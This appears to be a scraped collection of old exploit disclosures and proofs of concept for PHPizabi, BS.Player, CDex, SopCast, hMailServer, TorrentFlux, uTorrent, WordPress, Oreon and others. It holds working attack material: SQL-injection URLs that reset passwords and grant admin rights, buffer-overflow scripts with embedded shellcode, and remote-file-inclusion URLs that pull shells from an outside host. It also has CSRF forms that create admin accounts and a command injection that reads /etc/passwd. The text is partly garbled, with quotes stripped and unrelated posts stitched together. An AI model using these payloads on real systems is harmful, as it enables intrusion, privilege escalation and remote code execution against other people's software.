*/
$err[0]=[!] This script is intended to be launched from the cli!;
$err[1]=[!] You need the curl extesion loaded!;
if (php_sapi_name() cli) {
die($err[0]);
}
if (!extension_loaded('curl')) {
$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
if ($win) {
!dl(php_curl.dll) ? die($err[1]) : nil;
}
else {
!dl(php_curl.so) ? die($err[1]) : nil;
}
}
function syntax(){
print (
Syntax: php .$argv[0]. [host] [path] [[port]] [OPTIONS]
\n.
Options:
\n.
--port:[port] - specify a port
\n.
default - 80
\n.
--prefix- try to extract table prefix from
information.schema\n.
default - gl_
\n.
--uid:[n] - specify an uid other than default
(2,usually admin)\n.
--proxy:[host:port] - use proxy
\n.
--enforce - try even with 'not vulnerable'
message );
die();
}
error_reporting(E_ALL ^ E_NOTICE);
$host=$argv[1];
$path=$argv[2];
$prefix=gl_; //default
$uid=2;
$where= uid=$uid; //user id, usually admin, anonymous = 1
$argv[2] ? print([*] Attacking...\n) : syntax();
$_f_prefix=false;
$_use_proxy=false;
$port=80;
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini independent)
PHPizabi v0.848b C1 HFP1 proc.inc.php remote privilege escalation (php.ini
independent)
by Nine:Situations:Group::bookoo
our site: http://retrogod.altervista.org/
software site: http://www.phpizabi.net/
vulnerability:
sql injection in /theme/default/proc.inc.php
?php
function bufferProcParse($buffer) {
global $CONF;
$tpl = new template;
$tpl - LoadThis($buffer);
// HANDLE POSTED NOTEPAD DATA
///
if (isset($_GET[notepad_body])) {
myQ(UPDATE `[x]users` SET `notepad_body` =
'.urldecode($_GET[notepad_body]).' WHERE `id`='.me(id).');
me(flush);
}
..
note urldecode() ...
exploitation, manual:
injection urls:
change username and password of an existing user:
[sql]', username = 'bookoo', password = md5('pass') WHERE username = 'user'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20username%20=%20%2527bookoo%2527,%20password%20=%20md5(%2527pass%2527)%20WHERE%20username%20=%20%2527user%
2527/*
grant yourself admin rights:
[sql]', is_moderator = 1, is_administrator = 1, is_superadministrator = 1 WHERE
username = 'bookoo'/*
which becomes:
http://host/path_to_phpizabi/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%
20%2527bookoo%2527/*
navigate:
http://host/path_to_phpizabi/?L=admin.index
boom !
now go to:
http://host/path_to_phpizabi/?L=admin.cms.editid={cms.file}
use this opening and closing tag style, example:
script language=php
system(ls -la);
/script
(it is always availiable,
see:http://www.php.net/manual/en/language.basic-syntax.phpmode.php)
because of that preg_replace() in /modules/admin/cms/edit.php :
..
if (isset($_POST[Submit])) {
if ($handle = fopen(modules/cms/{$_GET[id]}.php, w)) {
$body =
?php if (!defined(\CORE_STRAP\)) die();
?\n
.preg_replace('#(\\?.*\\?)|(%.*%)|\\?php|\\?|\\?|%|%#si', NULL,
stripslashes($_POST[body][0]))
.\n!-- Edited by .me(username). on
.date($CONF[LOCALE_HEADER_DATE_TIME]). --;
;
fwrite($handle, $body);
fclose($handle);
..
which is bypassed.
save changes and navigate:
http://host/path_to_phpizabi/?L=cms._cms_file_
to see the output...
now visit log page:
http://192.168.0.1/phpizabi/?L=admin.logs.logs
..
original url: http://retrogod.altervista.org/9sg_phpizabi_848bc1.html
Bs.Player = 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh)
?php
/*
Bs.Player = 2.34 Build 980 (.bsl) local buffer overflow 0day exploit (seh)
by Nine:Situations:Group::pyrokinesis
Overlong hostnames in bsplayer playlist files causes eax and seh handlers to be
overwritten. Cannot reliably debug with olly because of code compression, just
used faultmon/memdump/msfpescan and I choosed the easy/universal way with seh.
There are some pop ret addresses in common among the vulnerable versions...
Well it says local but I consider it a remote one because .bsl files are
associated to the program
Tested and working against:
..
v2.32 Build 975 Free
v2.34 Build 980 PRO
win xp pro sp2 / sp3
win 2k3 sp1
not vulnerable:
v2.35 Build 985 PRO
V2.36 Build 990 Free/Pro
*/
$buffer=
\x23\x45\x58\x54\x4d\x33\x55\x0d\x0a\x23\x45\x58\x54\x49\x4e\x46.
\x3a\x30\x2c\x41\x41\x41\x41\x0d\x0a\x68\x74\x74\x70\x3a\x2f\x2f.
\x52\x61\x77\x2d\x48\x69\x67\x68\x2e;
$nop1=str_repeat(\x90,384);
$eax_again=;
$nop2=str_repeat(\x90,12);
$eax=;
$nop3=str_repeat(\x90,8);
$jnk=$nop1.$eax_again.$nop2.$eax.$nop3;
$jmp=\xeb\x08\x90\x90;
$seh=\xb1\xad\x41\x00; //0x0041adb1 pop pop ret bsplayer.exe
$nop4=str_repeat(\x90,100);
// win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2
http://metasploit.com
$scode=
\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49.
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x47.
\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x57\x32\x42\x42\x42\x32.
\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x59\x79\x4b\x4c\x69.
\x78\x37\x34\x67\x70\x45\x50\x75\x50\x6c\x4b\x61\x55\x45\x6c\x6e.
\x6b\x71\x6c\x73\x35\x62\x58\x66\x61\x6a\x4f\x4c\x4b\x42\x6f\x56.
\x78\x4c\x4b\x71\x4f\x77\x50\x57\x71\x6a\x4b\x72\x69\x6e\x6b\x75.
\x64\x4e\x6b\x75\x51\x68\x6e\x30\x31\x59\x50\x4d\x49\x4c\x6c\x4f.
\x74\x69\x50\x31\x64\x36\x67\x4f\x31\x4a\x6a\x44\x4d\x75\x51\x68.
\x42\x38\x6b\x5a\x54\x35\x6b\x62\x74\x75\x74\x37\x74\x70\x75\x68.
\x65\x4c\x4b\x51\x4f\x35\x74\x73\x31\x4a\x4b\x50\x66\x6c\x4b\x44.
\x4c\x50\x4b\x6c\x4b\x41\x4f\x77\x6c\x34\x41\x7a\x4b\x6c\x4b\x67.
\x6c\x6e\x6b\x37\x71\x6a\x4b\x4d\x59\x33\x6c\x71\x34\x54\x44\x39.
\x53\x55\x61\x6f\x30\x41\x74\x6c\x4b\x37\x30\x70\x30\x6e\x65\x4b.
\x70\x61\x68\x66\x6c\x6e\x6b\x61\x50\x36\x6c\x6e\x6b\x74\x30\x65.
\x4c\x6e\x4d\x6c\x4b\x71\x78\x64\x48\x68\x6b\x76\x69\x6c\x4b\x4f.
\x70\x48\x30\x75\x50\x75\x50\x55\x50\x4e\x6b\x63\x58\x67\x4c\x31.
\x4f\x56\x51\x4a\x56\x53\x50\x41\x46\x4f\x79\x4b\x48\x4b\x33\x39.
\x50\x61\x6b\x32\x70\x53\x58\x6c\x30\x4c\x4a\x65\x54\x53\x6f\x63.
\x58\x7a\x38\x49\x6e\x4e\x6a\x54\x4e\x70\x57\x69\x6f\x58\x67\x62.
\x43\x72\x41\x70\x6c\x70\x63\x43\x30\x47;
$buffer.=$jnk.$jmp.$seh.$nop4.$scode;
$buffer.=
x56\x37\x2e\x46\x4d\x2f\x6c\x69\x73\x74\x65\x6e\x2e\x70.
\x6c\x73\x0d\x0a\x00;
$fp=fopen(evil.bsl,w+);
if (!$fp) {die(cannot create evil.bsl!);}
@fputs($fp,$buffer);
@fclose($fp);
?
original url: http://retrogod.altervista.org/9sg_bsplayer_seh.html
CDex v1.70b2 (.ogg) local buffer overflow exploit poc
?PHP /* CDex v1.70b2 (.ogg) local buffer overflow exploit poc (win xp sp3) by Nine:Situations:Group::Pyrokinesis software site: http://cdexos.sourceforge.net/ our site: http://retrogod.altervista.org/ A very reliable buffer overflow exists in the way cdex process Ogg Vorbis Info headers. usage: c:\php\php 9sg_cdex_local.php evil.ogg is created, now navigate: Main Menu- Tools - Media file Player - Select files - Browse to a folder - - Open - Play evil.ogg */ $_frgmnt1 = OggS. //for what I understood ... beginning \x00. //stream_structure_version \x02. //header_type_flag \x00\x00\x00\x00\x00\x00\x00\x00. //granular_position \x66\x07\x00\x00. //bitstream_serial_number \x00\x00\x00\x00. //page_sequence_number \x92\xa8\x3b\xd9. //CRC_checksum \x01. //number_page_segments \x1e. //segments_table \x01. vorbis. \x00\x00\x00\x00\x02\x44\xac\x00\x00\x00\x00\x00\x00. \x00\x71\x02\x00\x00\x00\x00\x00\xb8\x01; $_frgmnt2 = OggS. \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x66\x07. \x00\x00\x01\x00\x00\x00. \x00\x00\x00\x00. //set crc to 0, after calculate the real crc \x51\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff. \xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff. \xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff. \xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff. \xff\xff\xff\xff\xff\x93\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff. \xff\xff\xff\xff\xff\xff\x03vorbis\x1d\x00\x00. \x00Xiph.Org\x20libVor. bis\x20I\x2020040629\x03\x00. \x00\x00\x07\x20\x00\x00. ARTIST=; $payload_len=8192; //msg box shellcode saying hey ... //replace with your own, the script recalculates the CRC checksum $scode = \x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a. \xbb\x7b\x1d\x80\x7c. //LoadLibraryA at 0x7c801d7b in kernel32.dll xpsp3 \x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50. \xbb\x30\xae\x80\x7c. //GetProcAddress at 0x7c80ae30 in kernel32.dll \xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51. \x51\x52\xff\xd0\x31\xd2\x50. \xb8\xfa\xca\x81\x7c. //ExitProcess at 0x7c81cafa in kernel32.dll \xff\xd0\xe8\xc4\xff. \xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff. \xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff. \xff\x48\x65\x79\x4e; $_boom=str_repeat(\x90,2048 - strlen($scode)).$scode. \x67\x86\x86\x7c. //eip - 0x7C868667 call esp kernel32.dll \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90. \x83\xec\x7f. // sub esp,07f \x83\xec\x7f. //.. \x83\xec\x7f. //.. \x83\xec\x7f. //.. \x83\xec\x7f. //.. \xff\xd4. //call esp \x90\x90\x90. \x00\x00\x00\x00;//if replaced with non-zero chars, overwrites seh ... do not touch $_frgmnt2.=$_boom.\x90\x90\x90\x90\x90\x90\x90\x90.str_repeat(\x90,$payload_len - strlen($_boom) - 8); $_frgmnt2.=\x0a\x20\x00\x00. PERFORMER=; $_frgmnt2.=str_repeat(\x90,$payload_len); $_frgmnt2.=\x09\x00\x00\x00. DATE=2009. \x01\x05. vorbis. \x29\x42\x43\x56\x01\x00\x08\x00\x00\x00\x31\x4c\x20\xc5\x80\xd0. \x90\x55\x00\x00\x10\x00\x00. \x60\x24\x29\x0e\x93\x66\x49\x29\xa5. \x94\xa1\x28\x79\x98\x94\x48\x49\x29\xa5\x94\xc5\x30\x89\x98\x94. \x89\xc5\x18\x63\x8c\x31\xc6\x18\x63\x8c\x31\xc6\x18\x63\x8c\x20. \x34\x64\x15\x00\x00\x04\x00\x80\x28\x09\x8e\xa3\xe6\x49\x6a\xce. \x39\x67\x18\x27\x8e\x72\xa0\x39\x69\x4e\x38\xa7\x20\x07\x8a\x51. \xe0\x39\x09\xc2\xf5\x26\x63\x6e\xa6\xb4\xa6\x6b\x6e\xce\x29\x25. \x08\x0d\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21. \x85\x14\x62\x88\x21\x86\x18\x62\x88\x21\x87\x1c\x72\xc8\x21\xa7. \x9c\x72\x0a\x2a\xa8\xa0\x82\x0a\x32\xc8\x20\x83\x4c\x32\xe9\xa4. \x93\x4e\x3a\xe9\xa8\xa3\x8e\x3a\xea\x28\xb4\xd0\x42\x0b\x2d\xb4. \xd2\x4a\x4c\x31\xd5\x56\x63\xae\xbd\x06\x5d\x7c\x73\xce\x39\xe7. \x9c\x73\xce\x39\xe7\x9c\x73\xce\x09\x42\x43\x56\x01\x00\x20\x00. \x00\x04\x42\x06\x19\x64\x10\x42\x08\x21\x85\x14\x52\x88\x29\xa6. \x98\x72\x0a\x32\xc8\x80\xd0\x90\x55\x00\x00\x20\x00\x80\x00\x00. \x00\x00\x47\x91\x14\x49\xb1\x14\xcb\xb1\x1c\xcd\xd1\x24\x4f\xf2. \x2c\x51\x13\x35\xd1\x33\x45\x53\x54\x4d\x55\x55\x55\x55\x75\x5d. \x57\x76\x65\xd7\x76\x75\xd7\x76\x7d\x59\x98\x85\x5b\xb8\x7d\x59. \xb8\x85\x5b\xd8\x85\x5d\xf7\x85\x61\x18\x86\x61\x18\x86\x61\x18. \x86\x61\xf8\x7d\xdf\xf7\x7d\xdf\xf7\x7d\x20\x34\x64\x15\x00\x20. \x01\x00\xa0\x23\x39\x96\xe3\x29\xa2\x22\x1a\xa2\xe2\x39\xa2\x03. \x84\x86\xac\x02\x00\x64\x00\x00\x04\x00\x20\x09\x92\x22\x29\x92. \xa3\x49\xa6\x66\x6a\xae\x69\x9b\xb6\x68\xab\xb6\x6d\xcb\xb2\x2c. \xcb\xb2\x0c\x84\x86\xac\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00. \x00\xa0\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a\xa6\x69\x9a. \xa6\x69\x9a\xa6\x69\x9a\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65.
Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc
!-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
user assisted remote code execution poc
by Nine:Situations:Group::surfista (IE7/8)
our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/
Through the SetExternalPlayer() method and the ExternalPlayer property
is possible to associate an arbitrary executable to the external player
button (for clearness see http://www.sopcast.com/docs/ where the player
control buttons are showed) which opens Windows Media Player by default.
When the user click this button, the executable is launched without prompts
Also this value is stored in config.xml, inside the sopcast local folder
for further use, ex. with the sopcast client application
Note: this control is safe for scripting and safe for initialization
--
HTML
HEAD
script language=Javascript type=text/JavaScript
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer(192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE);
SopPlayer.SetExternalPlayer(c:\\WINDOWS\\system32\\calc.exe);
SopPlayer.SetSopAddress(sop://broker.sopcast.com:3912/6002); //A LIVE CHANNEL
...
SopPlayer.SetChannelName(CCTV5);
SopPlayer.Play();
}
/script
/HEAD
BODY
OBJECT
ID=SopPlayer
name=SopPlayer
CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
HEIGHT=375
WIDTH=375
/OBJECT
/BODY
/HTML
original url: http://retrogod.altervista.org/9sg_sopcastia.html
Re: Re: Google Chrome Browser (ChromeHTML://) remote parameter injection POC
Attack vector is Internet Explorer 7/8b against a system with a coexistent google chrome installation. It works exactly like this: http://www.milw0rm.com/exploits/7181
hMAilServer 4.4.2 (PHPWebAdmin) local remote file inclusion
hMAilServer 4.4.2 (PHPWebAdmin) local remote file inclusion poc
by Nine:Situations:Group::strawdog
our site: http://retrogod.altervista.org
software site: http://www.hmailserver.com/
description: http://en.wikipedia.org/wiki/HMailServer
google dork: PHPWebAdmin for hMailServer intitle:PHPWebAdmin
-site:hmailserver.com -dork
poc:
regardless of register_globals magic_quotes_gpc:
http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../../boot.ini%00
http://hostname/path_to_webadmin/index.php?page=background/../../Bin/hMailServer.INI%00
http://hostname/path_to_webadmin/index.php?page=background/../../MySQL/my.ini%00
http://hostname/path_to_webadmin/index.php?page=background/../../../../../../../..
/../Program+Files/hmailserver/Bin/hmailserver.ini%00
with register_globals = on:
(prepare a functions.php folder on somehost.com with an index.html with your
shell inside on
a php enabled server,
otherwise a functions.php shell on a php disabled one)
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/cmd=dir
with register_globals = on magic_quotes_gpc = off :
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\boot.ini%00
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=http://www.somehost.com/shell.txt%00cmd=dir
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=c:\Program+Files\hMailServer\Bin\hMailServer.INI%00
http://hostname/path_to_webadmin/initialize.php?hmail_config[includepath]=../Bin/hMailServer.INI%00
Bin folder can be found in a different location, disclose the path by simply
calling:
http://hostname/path_to_webadmin/initialize.php
interesting file:
hMailServer.INI - contains two interesting fields:
- the Administrator password crypted with md5,
- by having knowledge of that you can calculate the MySQL root password,
specified in the password field.
You can do this by using the /Addons/Utilities/DecryptBlowfish.vbs script
(*)
vulnerable code, index.php:
?php
error_reporting(E_ALL);
if (!file_exists(config.php))
{
echo Please rename config-dist.php to config.php. The file is found in
the
PHPWebAdmin root folder.;
die;
}
require_once(config.php);
require_once(initialize.php);
set_error_handler(ErrorHandler);
if (is_php5())
set_exception_handler(ExceptionHandler);
$page = hmailGetVar(page);
if ($page == )
$page = frontpage;
$isbackground = (substr($page, 0,10) == background);
if ($isbackground)
$page = $page.php;
else
$page = hm_$page.php;
// Check that the page really exists.
$page = stripslashes($page);
if (!file_exists($page))
hmailHackingAttemp();
// If it's a background page, run here.
if ($isbackground)
{
include $page; //-- !!!
// Page is run, die now.
die;
}
..
for clearness, here it is hmailGetVar() function in /include/functions.php:
..
function hmailGetVar($p_varname, $p_defaultvalue = null)
{
$retval = $p_defaultvalue;
if(isset($_GET[$p_varname]))
{
$retval = $_GET[$p_varname];
}
else if (isset($_POST[$p_varname]))
{
$retval = $_POST[$p_varname];
}
else if (isset($_REQUEST[$p_varname]))
{
$retval = $_REQUEST[$p_varname];
}
if (get_magic_quotes_gpc())
$retval = stripslashes($retval);
return $retval;
}
..
so the page argument can be passed by $_GET[], $_POST[] or $_COOKIE[] arrays.
Note the stripslashes(), which disable magic_quotes_gpc on every argument
passed.
(**)
initialize.php:
..
$hmail_config['rootpath'] =
str_replace(\\,/,$hmail_config['rootpath']);
$hmail_config['includepath']=
str_replace(\\,/,$hmail_config['includepath']);
$hmail_config['temppath'] =
str_replace(\\,/,$hmail_config['temppath']);
require_once($hmail_config['includepath'] . functions.php);
..
Sea-Surfing on the Motorola Surfboard
More information about this flaw can be found here: http://www.rooksecurity.com/blog/?p=4 Motorola Surfboard Cable Modems suffer from two Denial of Service attacks by means of Cross Site Request Forgery. The latest version of The Motorola Surfboard is affected at the time of the writing. Restarts the modem: html form id=1 method=post action=http://192.168.100.1/configdata.html input name=BUTTON_INPUT value=Restart+Cable+Modem /form html script document.getElementById(1).submit(); /script This CSRF will disconnect the user from the internet for longer. The process to get back online from a factory default condition could take from 5 to 30 minutes. html form id=2 method=post action=http://192.168.100.1/configdata.html input name=BUTTON_INPUT value=Reset+All+Defaults /form html script document.getElementById(2).submit(); /script Peace
BitTorrent Clients and CSRF
The following are proof of concept exploits against three bittorrent clients.
uTorrent' WebUI, Azurues's HTML WebUI, and TorrentFlux.
More information:
http://www.rooksecurity.com/blog/?p=10
TorrentFlux v2.3(Latest)
http://sourceforge.net/projects/torrentflux/
If you force TorrentFlux to download a torrent that contains a file
backdoor.php you will be able to execute it by browsing here:
http://localhost/torrentflux_2.3/html/downloads/USER_NAME/
You do not have to know a password to access this folder, but you will have to
know the username.
html
form id='file_attack' method=post
action=http://localhost/torrentflux_2.3/html/index.php;
input type=hidden name=url_upload
value=http://localhost/backdoor.php.torrent;
input type=submit value='file attack'
/from
html
script
document.getElementById('file_attack').submit();
/script
html
Add an admistrative account:
form id=create_admin method=post
action=http://localhost/torrentflux_2.3/html/admin.php?op=addUser
input type=hidden name=newUser value=sadmin
input type=hidden name=pass1#8243; value=password
input type=hidden name=pass2#8243; value=password
input type=hidden name=userType value=1
input type=submit value=create admin
/form
/html
script
document.getElementById(create_admin).submit();
/script
uTorrents WebUI is also affected:
http://forum.utorrent.com/viewtopic.php?id=14565
force file download:
http://127.0.0.1:8080/gui/?action=add-urls=http://localhost/backdoor.torrent
utorrent change administrative login information:
http://127.0.0.1:8080/gui/?action=setsettings=webui.usernamev=badmin
http://127.0.0.1:8080/gui/?action=setsettings=webui.passwordv=badmin
http://127.0.0.1:8080/gui/?action=setsettings=webui.portv=4096
After the username or password have been changed then the browser must
re-authenticate.
http://127.0.0.1:8080/gui/?action=setsettings=webui.restrictv=127.0.0.1/24,10.1.1.1
So is Azuruess HTML WebUI:
Force file download:
http://127.0.0.1:6886/index.tmpl?d=uupurl=http://localhost/backdoor.torrent
etomite xss
Homepage: http://www.etomite.com/ Tested Version: 0.6.1 Final Exploit:http://localhost/etomite0614/index.php/%22%3E%3Cscript%3Ealert(%22test%22)%3C/script%3E/fill This is a flaw because $_SERVER['PHP_INFO'] is being trusted. $_SERVER['PHP_INFO'] will contain this value when the exploit url is used: /index.php/scriptalert(test)/script/fill /fill is removed. Trust no one. Michael Brooks
Re: Wordpress - Broken Access Control
Hi all,
Apparently there is some disagreement about this issue. I am providing more
information to build a greater understanding about what is happening.
This problem is entirely contained within the query.php file. At the comment
header of query.php it says: The Big Query. Yes indeed this file produces a
large query. This file is very disorganized and it was difficult to go though
with a fine tooth comb, but I did and i found a flaw because of it. I was
looking for SQL Injection, but broken access control will get me a CVE number.
Perhaps this URL provides more information:
http://localhost/wordpress/index.php/'wp-admin/
I urge everyone to make this get request and to print the
$_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] variables.
You will see that wp-admin/ is at the end of these variables.
I should have provided the exact point in which the flawed query is being
built. I thought that my PoC was enough, my bad.
if ( is_admin() )
$where .= OR post_status = 'future' OR post_status = 'draft'
OR post_status = 'pending';
This url: htttp://localhost/wordpress/index.php/'wp-admin/ will cause the
is_admin() function to return TRUE.
function is_admin () {
global $wp_query;
return ($wp_query-is_admin || (stripos($_SERVER['REQUEST_URI'],
'wp-admin/') !== false));
}
In the future you shouldn't attack someone who is trying to help. This is a
complex and irregular issue so I totally understand why it was difficult to
see. In the future you shouldn't dismiss something you do not understand,
instead i urge you to ask questions and learn more.
Peace
Phpay - Local File Inclusion
By Michael Brooks
Vulnerability Type:Local File Inclusion
Software: Phpay
Homepage:http://sourceforge.net/projects/phpay/
Version Affected:2.02.1
Phpay has been affected by multiple local file include flaws, as a result this
patch was written:
$config = ereg_replace(:,, $config);
$config = trim(ereg_replace(../,, $config));
$config = trim(ereg_replace(/,, $config));
if (($config==)|| (!eregi(.inc.php,$config))){$config=config.inc.php;
echo !--$config--\n;}
if (!file_exists($config)) { echo panic: $config doesn't exist!! Did you
backup it after installation? ...; exit;}
require(./$config);
To bypass this patch backslashes can be used instead of forward slashes on
windows systems.
Also .inc.php must exists *somewhere* in the string.
Local File Include for windows only:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
or if magic_quotes_gpc is turned on:
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess
Remote code execution is accessible in the ./admin/ folder.
The admin folder *should* be protected by a .htaccess file similar to
osCommerce2.
Vulnerable configuration:
A there is a call to extract($_GET) so the exploit will work regardless of
register_globals. Using Linux is a very good fix for this issue.
Merry Christmas
Anon Proxy Server - Remote Code Execution
By Michael Brooks Vulnerability type: Multiple Remote System commands execution. Software: Anon Proxy Server Home page:http://sourceforge.net/projects/anonproxyserver/ Affects version: 0.100 Example exploit: http://127.0.0.1/anon_proxy_server_0.100/diagdns.php?host=google.com%5C%27+%26%26+cat+%2Fetc%2Fpasswd+%23 A virtually identical flaw exists in diagconnect.php however it takes longer to execute. Anon Proxy Server forces magic_quotes_gpc=on, However magic_quotes_gpc does not protect the system() function from taint. For protection you should use the escapeshellarg() function. Removing diagdns.php and diagconnect.php is the best temporary solution. Also magic_quotes_gpc is being removed in php6, so Anon Proxy Server will have to revamp there security. Peace
Oreon/Centreon - Multiple Remote File Inclusion
By Michael Brooks Vulnerability Type: Multiple Remote File Inclusion. Software: Oreon and Centreon Homepage:http://www.oreon-project.org/ or http://www.centreon.com/ Versions: 1.4(Oreon) and 1.4.1(Centreon) The vulnerable file is: ./oreon-1.4/www/include/monitoring/engine/MakeXML.php Another,virtually identical RFI: ./oreon-1.4/www/include/monitoring/engine/MakeXML4statusCounter.php The attack: http://127.0.0.1/include/monitoring/engine/MakeXML.php?fileOreonConf=http://evilurl/backdoor.txt? or http://127.0.0.1/include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://evilurl/backdoor.txt? file MakeXML.php line 42 43: include_once($oreonPath . www/oreon.conf.php); include_once($oreonPath . www/include/common/common-Func-ACL.php); Register_globals isn't needed for the taint: file MakeXML.php line 28: if (isset($_GET[fileOreonConf])) $oreonPath = $_GET[fileOreonConf]; However magic_quotes_gpc is require for LFI because you need a null byte. Peace
PHP RPG - Sql Injection and Session Information Disclosure.
By Michael Brooks Vulneralbity: Sql Injection and Session Information Disclosure. Homepage:http://sourceforge.net/projects/phprpg/ Verison affected 0.8.0 There are two flaws that affect this applcation. A nearly vinnella login bypass issues affects phprpg. If magic_qutoes_gpc=off then this will login an attacker as the administrator using this: username:1'or 1=1 limit 1/* password:1 Keep in mind that magic_quotes_gpc is being removed in php6! The second flaw allows an attacker to steal any session registered by phprpg by navigating to this directory: http://localhost/phpRPG-0.8.0/tmp/ This is because phprpg has manually changed the directory using session_save_path() which is called in init.php on line 49. Peace
Wordpress - Broken Access Control
By Michael Brooks
Vulnerability:Broken Access Control
Homepage:http://wordpress.org/download
Software: Wordpress
Version affected:2.3.1 (Latest at the time of writing)
The impact of the flaw is that an attacker can read posts while they are still
drafts. This is an ability that only the administrator should have. Imagine a
stranger being able to read the news before it is published. Or perhaps a
spam-blog harvesting posts before they are published.
This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global
variable. Manipulation of $_SERVER['REQUEST_URI']has led to many xss flaws.
Although an attacher shouldn't be able to control all $_SERVER variables, none
of them should be trusted.
exploit:
htttp://localhost/wordpress/'wp-admin/
This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to
contain the value:
htttp://localhost/wordpress/'wp-admin/
Vulnerable function:
line 34, in ./wp-includes/query.php.
function is_admin () {
global $wp_query;
return ($wp_query-is_admin || (stripos($_SERVER['REQUEST_URI'],
'wp-admin/') !== false));
}
The same flaw is duplicted in again on line 645 of the same file.
This url: htttp://localhost/wordpress/'wp-admin/
will cause the is_admin() function to return true. This flaw works regardless
of register_globas or magic_quotes_gpc. The attack fails when search engine
friendly urls are turned on in wordpress, however this option is turned off by
default. Turning search engine friendly urls on is a workaround until a patch
is created.
Peace
IceBB 1.0rc6 = Remote SQL Injection
[|Description:|]
A security breach has been discoverd in IceBB 1.0-rc6.
This breach is caused by a bad filtering of the X-Forwarded-For variable:
./includes/functions.php, line 73
$ip = empty($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['REMOTE_ADDR'] :
$_SERVER['HTTP_X_FORWARDED_FOR'];
$ip = $this-clean_key($ip);
$input['ICEBB_USER_IP'] = $ip;
./icebb.php, line 169
$icebb-client_ip = $input['ICEBB_USER_IP'];
./admin/index.php, line 112
$icebb-adsess = $db-fetch_result(SELECT adsess.*,u.id as
userid,u.username,u.temp_ban,g.g_view_board FROM icebb_adsess AS adsess LEFT
JOIN icebb_users AS u ON u.username=adsess.user LEFT JOIN icebb_groups AS g ON
u.user_group=g.gid WHERE adsess.asid='{$icebb-input['s']}' AND
adsess.ip='{$icebb-client_ip}' LIMIT 1);
A hacker could exploit this security breach in order to alter a SQL request.
[|Exploit:|]
http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.php
[|Solution:|]
No one. Think about update your forum core when a patch will be available on
the official website.
[|Credits:|]
Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com)
for AeroX (AeroXteam.fr)
[|Greetz:|]
Math², KERNEL_ERROR, NeoMorphS, Snake91, Goundy, Alkino (...) And everybody
from #aerox
Re: IceBB 1.0rc6 = Remote SQL Injection
correction [|Exploit:|] http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.txt
Re: MkPortal All Guests are Admin Exploit
Fixed In Mkportal version 1.1.1
MetaForum = 0.513 Beta - Remote file upload Vulnerability
[|Description:|]
A security bug has been discovered in MetaForum 0.513 Beta.
This bug can be used by an attacker to upload a malicious php file on the
server.
During the upload, the MIME type of the file is the only verified parameter.
The extention isn't.
This enables a attacker to fake the MIME type of a php file so that it is
considered as an image.
[|Exploit:|]
http://www.aeroxteam.fr/exploit-MetaForum-0.513b.txt
[|Solution:|]
Replace line 110 in the file usercp.php by:
if (($_FILES['imagefile']['type'] == image/jpeg ||
$_FILES['imagefile']['type'] == image/pjpeg || $_FILES['imagefile']['type']
== image/png || $_FILES['imagefile']['type'] == image/gif)
in_array(strtolower(substr(strrchr($_FILES['imagefile']['name'], '.'),1)),
array('gif', 'jpg', 'jpeg', 'png')))
[|Credits:|]
Gu1ll4um3r0m41n (aeroxteam --[at]-- gmail --[dot]-- com)
for AeroX NeoAlpha (AeroXteam.fr -- Neoalpha.fr)
[|Gr33tz:|]
